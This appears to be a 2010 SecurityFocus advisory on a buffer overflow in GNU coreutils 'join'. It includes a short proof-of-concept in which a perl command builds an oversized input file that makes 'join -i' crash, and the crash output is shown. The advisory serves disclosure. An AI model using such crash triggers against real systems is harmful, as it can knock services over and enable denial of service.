GNU Coreutils 'join' Text Utility Buffer Overflow Vulnerability

The following proof-of-concept is available:

% perl -e 'print "1","A"x50000000,"\r\n\r\n"' > /tmp/test.txt
% join -i /tmp/test.txt /tmp/test.txt
[1] 13579 segmentation fault join -i /tmp/test.txt /tmp/test.txt
% rm /tmp/test.txt


 

Privacy Statement
Copyright 2010, SecurityFocus